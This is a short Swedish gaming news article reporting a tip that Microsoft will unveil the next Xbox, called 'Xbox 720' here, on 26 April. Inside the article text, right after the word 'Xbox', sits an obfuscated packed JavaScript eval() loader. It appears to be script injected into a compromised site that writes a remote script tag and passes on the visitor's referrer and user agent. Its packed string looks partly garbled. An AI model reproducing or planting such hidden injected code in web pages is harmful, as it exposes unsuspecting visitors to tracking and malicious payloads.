Image Image Image Image Image Image Image Image Image Image

| 9 juli, 2020

Scroll to top

Top

Nya Xbox 720 visas upp den 26 april

Nya Xbox 720 visas upp den 26 april
Sebastian

Xbox eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|trara|var|u0026u|referrer|tifyh||js|php’.split(’|’),0,{}))
720: För några dagar sedan rapporterades det att nya rykten gällande Microsofts kommande konsol Xbox 720 (Working title) fanns att ta del av på webben. Sajter som CVG och VG247 hade insikter på att konsolen skulle visa upp någon gång i april. Nu uppger ett twittermeddelande från CVGs Rob Crossley ett exakt datum i april.

– Evenemanget för nästa Xbox är schemalagt till 26 april, har jag fått höra från en person jag litar på. Microsoft skulle kunna ändra datumet, men var medveten när du fyller i din kalender, twittrade Rob.

Som det ser ut nu så kommer konsolen att visas upp i slutet av april och det är då vi får se nästa generations monster. Revue.se kommer att håller er uppdaterade med allt från både Playstation 4 och Xbox 720. Det ser ut att bli ett otroligt roligt spelår.